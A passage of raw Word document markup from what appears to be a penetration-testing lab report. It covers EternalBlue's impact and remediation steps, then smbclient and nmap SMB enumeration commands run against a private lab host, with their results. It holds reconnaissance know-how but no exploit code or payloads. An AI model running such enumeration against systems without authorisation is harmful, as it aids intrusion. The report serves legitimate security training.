      <w:r>
        <w:t xml:space="preserve">This leads to remote code execution with SYSTEM privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E95E0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Real-World Example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D488B9E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="211" w:line="397" w:lineRule="auto"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was weaponized by WannaCry ransomware in 2017, which crippled organizations like the UK’s NHS and FedEx. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320ECB0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="3387"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc23324"/>
      <w:r>
        <w:t xml:space="preserve">2.2.3 Corrective and Preventive Measures </w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3124EFEF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="177" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3387"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Corrective Measures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71156F0D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="288"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Immediately apply the MS17-010 patch from Microsoft. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E522DA6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable SMBv1 protocol (registry or via PowerShell). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE10C0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="271"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close port 445 on the firewall. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC54840" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="323" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Preventive Measures: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7471A96C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="288"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply security updates regularly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D7CD6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="288"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a vulnerability scanner (like OpenVAS or Nessus) on a schedule. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342AE719" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="291"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network segmentation: isolate critical machines. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AA8CFB" w14:textId="6F650D01" w:rsidR="0086222C" w:rsidRDefault="00000000" w:rsidP="00F5636D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="219"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An intrusion detection system to alert to SMB exploitation attempts. </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF2D0A" w14:textId="278A93B8" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="82"/>
        <w:ind w:left="-5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc23325"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r w:rsidR="00F5636D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>enum4Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="099F806C" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="456" w:lineRule="auto"/>
        <w:ind w:right="4129"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> enum4linux, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470E7405" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="260"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To gather SMB share information, user lists, and check for anonymous access or misconfigurations on the target host 192.168.240.129. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085B3EB" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="37" w:line="442" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="5236"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc23326"/>
      <w:r>
        <w:t xml:space="preserve">2.3.1 Technical Steps &amp; Screenshots </w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7453F883" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="37" w:line="442" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="240"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SMBClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Anonymous Access Attempt Command Used:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -L \\192.168.240.129 -N </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471B7FE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anonymous login was successful. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC7599" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, no shares were listed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58283EC1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Error: NT_STATUS_RESOURCE_NAME_NOT_FOUND and Unable to connect with SMB1 – no workgroup available </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC5998" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="214" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404EDA16" wp14:editId="2C114301">
                <wp:extent cx="5373065" cy="3235350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="21681" name="Group 21681"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5373065" cy="3235350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5373065" cy="3235350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1987" name="Rectangle 1987"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5334965" y="2795372"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="75E82A93"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88" name="Rectangle 1988"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3066644"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="76727C3F"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92" name="Picture 1992"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="37795" y="14351"/>
                            <a:ext cx="5266690" cy="2882265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1993" name="Shape 1993"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="23508" y="0"/>
                            <a:ext cx="5295265" cy="2910840"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5295265" h="2910840">
                                <a:moveTo>
                                  <a:pt x="0" y="2910840"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5295265" y="2910840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="529526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681" style="width:423.076pt;height:254.752pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="53730,32353">
                <v:rect id="Rectangle 1987" style="position:absolute;width:506;height:2243;left:53349;top:27953;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1988" style="position:absolute;width:506;height:2243;left:0;top:30666;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1992" style="position:absolute;width:52666;height:28822;left:377;top:143;" filled="f">
                  <v:imagedata r:id="rId35"/>
                </v:shape>
                <v:shape id="Shape 1993" style="position:absolute;width:52952;height:29108;left:235;top:0;" coordsize="5295265,2910840" path="m0,2910840l5295265,2910840l5295265,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05C9C6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1A9B8E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="229" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap SMB Enumeration Script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE5C45" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="182" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B69A0F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4556"/>
        </w:tabs>
        <w:spacing w:after="219" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>shares,smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">-users -p445 192.168.240.129 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4106DE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B14F30" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="210"/>
        <w:ind w:right="147"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To attempt listing shared resources and user accounts using SMB enumeration scripts provided by Nmap. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737A46D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="247" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABC816" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMB port 445 is open. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527A958" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access to ADMIN$, C$, and IPC$ denied. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D985508" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anonymous access gave minimal results. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6802F95B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D443C01" wp14:editId="2DBEC682">
                <wp:extent cx="5349558" cy="3286151"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="21942" name="Group 21942"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5349558" cy="3286151"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5349558" cy="3286151"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2066" name="Rectangle 2066"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="205092" y="32254"/>
                            <a:ext cx="93238" cy="185075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="50B489CB" w14:textId="77777777" w:rsidR="0086222C"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067" name="Rectangle 2067"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="275196" y="0"/>
                            <a:ext cx="56314" cy="226001"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="45BB7A1E" w14:textId="77777777" w:rsidR="0086222C"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068" name="Rectangle 2068"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="433641" y="32254"/>
                            <a:ext cx="3355769" cy="184382"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="34BC2FF6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:t>Error: NT_STATUS_ACCESS_DENIED</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2069" name="Rectangle 2069"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2957766" y="2134"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="41556C5F"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70" name="Rectangle 2070"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5311458" y="3117444"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="689608CA"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5" name="Picture 2075"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId36"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="336550"/>
                            <a:ext cx="5266690" cy="2882265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2076" name="Shape 2076"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="322199"/>
                            <a:ext cx="5295265" cy="2910840"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5295265" h="2910840">
                                <a:moveTo>
                                  <a:pt x="0" y="2910840"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5295265" y="2910840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="529526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942" style="width:421.225pt;height:258.752pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="53495,32861">
